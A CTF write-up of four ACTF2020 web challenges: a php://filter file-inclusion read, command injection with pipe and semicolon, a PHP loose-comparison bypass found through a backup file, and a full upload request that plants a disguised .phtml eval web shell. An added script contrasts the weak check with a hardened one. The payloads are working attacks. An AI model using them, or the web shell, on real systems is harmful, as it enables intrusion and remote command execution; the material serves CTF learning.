ACTF2020 challenge writeups
source link: https://sunny250.github.io/2020/04/26/ACTF%E5%88%B7%E9%A2%982020/
Include
A simple file inclusion via a PHP stream wrapper (伪协议):
?file=php://filter/convert.base64-encode/resource=flag.php
then base64-decode the output to get the source of flag.php:
echo "Can you find out the flag?";
//flag{9dc5b2d8-37cf-45a6-b5a3-68b3d5c6c2e5}
No filtering is applied; the challenge tests Linux knowledge: how to run several commands on one line. Commands can be joined with &&, separated with a semicolon ;, or chained with the pipe symbol |. In this challenge only | and ; work (not sure why).
payload
127.0.0.1 | cat /flag
or
127.0.0.1;cat /flag
BackupFile
A directory scan reveals a backup file:
sunny250@kali ~ # dirb http://5c64e8b8-c5fa-41d4-8c5e-ad84cf14332e.node3.buuoj.cn/ ~/web/dictionaries/CTFwebdir.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Apr 26 13:01:43 2020
URL_BASE: http://5c64e8b8-c5fa-41d4-8c5e-ad84cf14332e.node3.buuoj.cn/
WORDLIST_FILES: /Users/sx/web/dictionaries/CTFwebdir.txt
-----------------
GENERATED WORDS: 53
---- Scanning URL: http://5c64e8b8-c5fa-41d4-8c5e-ad84cf14332e.node3.buuoj.cn/ ----
+ http://5c64e8b8-c5fa-41d4-8c5e-ad84cf14332e.node3.buuoj.cn/index.php.bak (CODE:200|SIZE:347)
+ http://5c64e8b8-c5fa-41d4-8c5e-ad84cf14332e.node3.buuoj.cn/flag.php (CODE:200|SIZE:0)
-----------------
END_TIME: Sun Apr 26 13:01:46 2020
DOWNLOADED: 53 - FOUND: 2
Visiting index.php.bak gives the source:
<?php
include_once "flag.php";
if(isset($_GET['key'])) {
    $key = $_GET['key'];
    if(!is_numeric($key)) {
        exit("Just num!");
    }
    $key = intval($key);
    $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
    if($key == $str) {
        echo $flag;
    }
}
else {
    echo "Try to find out source file!";
}
With a loose comparison (==), PHP converts the operands first: when a string is compared with an integer, both are converted to integers.
So submitting key=123 is enough.
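As an added example (not the challenge's or the writeup's own code), the script below puts the weak check from index.php.bak beside a strict, type-safe one so the bypass can be reproduced locally. $expected is the string from the challenge source; the other inputs are constructed sample values of the key parameter.

```php
<?php
// Added example, not the challenge's own code. Compares the weak check from
// index.php.bak with a hardened version. $expected is the challenge string;
// the inputs below are constructed sample values of the `key` parameter.
declare(strict_types=1);

$expected = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";

// Vulnerable form: mirrors the original logic (is_numeric + intval + ==).
function weakCheck(string $input, string $expected): bool
{
    if (!is_numeric($input)) {
        return false;
    }
    $key = intval($input);
    // Loose ==: on PHP 7, the int operand makes PHP cast $expected to an
    // integer, "123ffws..." becomes 123, so key=123 passes. PHP 8 compares a
    // non-numeric string with an int as strings, so the same input fails.
    return $key == $expected;
}

// Hardened form: never cast the secret; compare the raw submission with a
// type-safe, timing-safe comparison, so no numeric prefix can match.
function strictCheck(string $input, string $expected): bool
{
    return hash_equals($expected, $input);
}

foreach (["123", "124", "abc", $expected] as $in) {
    printf(
        "%-46s weak=%-5s strict=%s\n",
        var_export($in, true),
        var_export(weakCheck($in, $expected), true),
        var_export(strictCheck($in, $expected), true)
    );
}
```

On PHP 7 the weak check reports true for "123" and false for the others, while the strict check only accepts the exact secret; on PHP 8 the weak check also rejects "123", because the "Saner string to number comparisons" change compares an int with a non-numeric string as strings.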
Upload
The challenge page shows a light; hovering the mouse over the bulb reveals an upload form.
Uploading 1.php directly is blocked; trying other extensions shows that .phtml is accepted:
POST / HTTP/1.1
Host: 32d2077b-2b33-467c-93db-234875e1f69e.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------380150826415384369013004740571
Content-Length: 406
Origin: http://32d2077b-2b33-467c-93db-234875e1f69e.node3.buuoj.cn
Connection: close
Referer: http://32d2077b-2b33-467c-93db-234875e1f69e.node3.buuoj.cn/
Upgrade-Insecure-Requests: 1

-----------------------------380150826415384369013004740571
Content-Disposition: form-data; name="upload_file"; filename="1.phtml"
Content-Type: image/gif

GIF89a
<script language="php">
eval($_POST[cmd]);
</script>
-----------------------------380150826415384369013004740571
Content-Disposition: form-data; name="submit"

upload
-----------------------------380150826415384369013004740571--
The response gives the upload path; connect to it with AntSword (蚁剑) and read the flag.